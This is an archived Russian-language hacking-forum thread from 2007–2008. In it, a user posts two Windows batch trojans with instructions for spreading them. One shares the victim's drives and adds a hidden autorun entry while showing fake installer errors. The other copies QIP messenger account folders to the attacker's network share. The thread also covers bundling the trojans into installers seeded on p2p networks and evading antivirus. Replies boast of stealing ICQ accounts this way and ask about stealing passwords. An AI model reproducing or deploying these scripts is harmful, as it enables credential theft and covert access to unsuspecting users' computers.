ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
19.09.2007, 14:14
|
|
Постоянный
Регистрация: 21.08.2007
Сообщений: 367
Провел на форуме:
3578960
Репутация:
468
|
|
***Добавлю ищо от себя***
Да ламеров в сети много, но заветные шестизнаки обычно не у них.(
Я поступил таким образом.
Сделал два .bat файла.
Первый более универсальный, но и более паливный:
@echo off
if exist c:\Windows\windll.bat goto A
copy windll.bat c:\Windows\
:A
net start server
net share C=c:\
net share E=e:\
net share D=d:\
net share F=f:\
net share G=g:\
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run /v windll.lib /t REG_SZ /d C:\Windows\windll.bat
echo extract cab12023043444
echo ......................
echo error 346: file cab2032523553 not found.
echo abort install...
pause
Что делает: при запуске расшаривает корневые диски винды, копирует себя в виндовую папку под названием windll.bat (естествено переименуйте), и создает ключик в реестре в автозапуске.
строк типа: echo extract cab12023043444 - должно быть много, чтобы юзер ничего не заподозрил.
Впаривание: берем программку типа Smart installer (на секьюритилабе есть), берем кокуюнить полезную прогу и с помощью этого инсталлера прилепляем её запуск при установке программы. Либо любой другой способ для впаривания троянов. И расшариваем в ДС++(или другом p2p-клиенте), чтобы мы могли видеть кто скачивает прогу.
Ещё: антивирями естественно не палица, но в ехе конвертировать не советую(хотя желательно, дабы юзверь сорцы не посмотрел) ибо аваст почему-то ругнулся на него, каспер и нод32 молчат.
Второй, конкретно для квипа:
@echo off
echo please wait...
IF EXIST "C:\Program Files\QIP\users" copy /Y "C:\Program Files\QIP\users\*" "C:\shared" /Y
IF EXIST "C:\Program Files\QIP\Users" xcopy "C:\Program Files\QIP\Users" \\172.16.201.64\shared\ /S /C /Q /H /Y
IF EXIST "D:\Program Files\QIP\Users" xcopy "C:\Program Files\QIP\Users" \\172.16.201.64\shared\ /S /C /Q /H /Y
IF EXIST "C:\QIP\Users" xcopy "C:\Program Files\QIP\Users" \\172.16.201.64\shared\ /S /C /Q /H /Y
IF EXIST "D:\QIP\Users" xcopy "C:\Program Files\QIP\Users" \\172.16.201.64\shared\ /S /C /Q /H /Y
echo ......................
echo error 346: file cab2032523553 not found.
echo error 346: file cab2032523554 not found.
echo error 346: file cab2032523555 not found.
echo abort install...
pause
Что делает: для начала расшариваем у себя папку shared на полный доступ, бат'ик смотрит наличие папок с установленным квипом и копирует содержимое папки users к вам на машину.
Впаривание: аналогичное первому.
Еще: его нада конвертить в ехе, ибо светица ip. антивирями тоже не палица.
З.Ы. Очень желательно изменить код под свои цели)
З.Ы.Ы. если кому-то нада подробно обьяснить устройство и принцип работы - пишите в личку.
Последний раз редактировалось life_is_shit; 19.09.2007 в 14:18..
|
|
|
19.09.2007, 17:25
|
|
Постоянный
Регистрация: 21.08.2007
Сообщений: 367
Провел на форуме:
3578960
Репутация:
468
|
|
***Еще***
Если кто-то будет тестить первый батник на своем компе, облегчу вам жизнь.
Противоядие:
echo removing, please wait...
echo __________________________________________________ _________
net share c /delete
net share E /delete
net share D /delete
reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run /v windll.lib /f
del c:\Windows\windll.bat /q
echo __________________________________________________ _________
echo Troja  removed!!!
pause Он уберет расшары, удалит файл из виндовой папки и реестра...
|
|
|
|
22.09.2007, 20:12
|
|
Участник форума
Регистрация: 01.01.2006
Сообщений: 262
Провел на форуме:
1718386
Репутация:
686
|
|
Автору +1
в сетке нашлись 3 юзера с расшаренными кипами, 6 девяток
не шохи но результат есть все равно (имею в виду наличие сабжа, аськи мне естессно не нужны), не надо гнать на аффтара
Последний раз редактировалось AdvLamer; 22.09.2007 в 20:16..
|
|
|
|
30.01.2008, 16:28
|
|
Banned
Регистрация: 10.06.2006
Сообщений: 938
Провел на форуме:
7792614
Репутация:
1223
|
|
ищите сразу сбрученые осеки good.txt :\
|
|
|
|
17.02.2008, 11:22
|
|
Новичок
Регистрация: 17.02.2008
Сообщений: 7
Провел на форуме:
135639
Репутация:
0
|
|
Аффтар , прежде чем писать статьи, сначала в инете поищи, я на Whack.ru выкладывал подробную статью, вместе с видео.. перед тем как писать её, я весь инет облазил...
я предъяв не кидаю, но будь внимателен, мне уже несколько человек сказали, что ты у меня статью увёл///
SatanAnge
Viva la Whack
|
|
|
|
17.02.2008, 15:09
|
|
Постоянный
Регистрация: 21.08.2007
Сообщений: 367
Провел на форуме:
3578960
Репутация:
468
|
|
мм. ссылку в студию!}:[
|
|
|
|
17.02.2008, 18:36
|
|
Новичок
Регистрация: 12.02.2008
Сообщений: 14
Провел на форуме:
203537
Репутация:
6
|
|
Статья кул  Но все таки больше интересует как проделать аналогичное с "асей" ,там пароль вроде в реестр сохраняется.... |
|
|
|
22.02.2008, 12:56
|
|
Новичок
Регистрация: 11.01.2008
Сообщений: 4
Провел на форуме:
88100
Репутация:
5
|
|
Сам тоже самое делаю давно уже...узнал на allcheats про эту фишку... на самом деле расшаривают дистрибутивы вместе с QIP, Opera и т.д.
только советую для таких целей не QPR использовать а Multi password recovery, скачать можно - > passrecovery.com < - кряк в и-нете ..
поправочка ! перепутал с другим QPR ... это очень даже ничего.
Последний раз редактировалось kef1rJkez0r; 22.02.2008 в 13:31..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
